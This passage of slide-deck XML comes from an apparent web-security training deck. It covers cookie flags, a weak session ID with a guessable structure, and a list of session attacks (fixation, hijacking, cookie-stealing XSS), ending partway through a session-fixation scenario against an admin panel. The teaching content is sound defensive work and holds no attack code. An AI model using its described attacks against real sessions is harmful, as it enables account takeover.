                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>“.” means any sub-domain</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1148" name="Google Shape;1148;p165"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6173850" y="2001675"/>
            <a:ext cx="2550600" cy="7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Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Path</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="363F44"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Restricts cookie </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>   to this URI</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1149" name="Google Shape;1149;p165"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5422200" y="3901950"/>
            <a:ext cx="3638100" cy="11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Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Optional Security Flags</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="363F44"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>httpOnly: JS cannot access</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="363F44"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>secure: only over HTTPS</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="363F44"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>sameSite: CSRF protection</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1150" name="Google Shape;1150;p165"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2967375" y="3901949"/>
            <a:ext cx="2193600" cy="10344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363F44"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Expires</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="363F44"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>How long the cookie will be stored</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1151" name="Google Shape;1151;p165"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="1146" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1485375" y="1616775"/>
            <a:ext cx="521100" cy="248700"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="triangle" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1152" name="Google Shape;1152;p165"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3446325" y="1705850"/>
            <a:ext cx="0" cy="2294700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="triangle" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1153" name="Google Shape;1153;p165"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4628200" y="1493625"/>
            <a:ext cx="1463400" cy="1299000"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="triangle" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1154" name="Google Shape;1154;p165"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6485650" y="1523950"/>
            <a:ext cx="562800" cy="459000"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="triangle" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1155" name="Google Shape;1155;p165"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6914175" y="2610750"/>
            <a:ext cx="2632500" cy="459000"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 74338"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="triangl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66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-60625" y="-3800"/>
            <a:ext cx="9230700" cy="2519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6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="445025"/>
            <a:ext cx="8520600" cy="3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Weak Session IDs and Session Hijack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1162" name="Google Shape;1162;p166"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404800" y="1152475"/>
            <a:ext cx="8520600" cy="3285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900"/>
              <a:t>Session IDs need to be random and unique</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-311150" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>If you can predict a session id, you can become that user</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>This session ID has a minimal amount of entropy. It’s easy to guess other valid values</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="457200" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="54626A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="457200" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SID=1792:10192:1512664092:U29mdHdhcmUgRW5naW5lZXJpbmc=</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SID=  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1792: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10192:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="B4A7D6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1512664092:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="00B000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>U29mdHdhcmUgRW5naW5lZXJpbmc=</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="00B000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="4A86E8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    	    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Identifier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="980000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>role</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="B4A7D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>timestamp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="9900FF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="6BBF4E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>business unit (base64’ed)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6BBF4E"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>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Weak Session IDs and Session Hijack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1168" name="Google Shape;1168;p167"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404800" y="1152475"/>
            <a:ext cx="8520600" cy="32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dirty="0"/>
              <a:t>Different types of attacks on sessions</a:t>
            </a:r>
            <a:endParaRPr sz="2100" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-323850" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1" dirty="0"/>
              <a:t>Session Fixation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" dirty="0"/>
              <a:t> - The attacker forces the victim to use a specific session ID. Perhaps by sending a malicious link with the session ID embedded in the URL</a:t>
            </a:r>
            <a:endParaRPr sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-323850" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1" dirty="0"/>
              <a:t>Session Hijacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" dirty="0"/>
              <a:t> - The attacker steals the session cookie and is able to impersonate the user. This can happen if cookies are sent over HTTP instead of HTTPS</a:t>
            </a:r>
            <a:endParaRPr sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1" dirty="0"/>
              <a:t>Cross-Site Scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" dirty="0"/>
              <a:t> - The attacker injects code into the client, which then exfiltrates session cookies</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" dirty="0"/>
            </a:br>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="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68"/>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Choose Your Own Session - Session Fixation </a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1174" name="Google Shape;1174;p168"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="770917" y="1198731"/>
            <a:ext cx="730331" cy="728400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1175" name="Google Shape;1175;p168"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1599163" y="1356575"/>
            <a:ext cx="9096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Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>User</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1176" name="Google Shape;1176;p168"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7671517" y="1198729"/>
            <a:ext cx="730324" cy="729105"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1177" name="Google Shape;1177;p168"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7093725" y="1406798"/>
            <a:ext cx="7302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63F44"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Duo</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1178" name="Google Shape;1178;p168"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1113850" y="1955525"/>
            <a:ext cx="68430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latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>1. A user gets an email with a link to /groups in the Admin Panel, from an attacker who has</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>    users previous session ID.  They click on the link.</a:t>
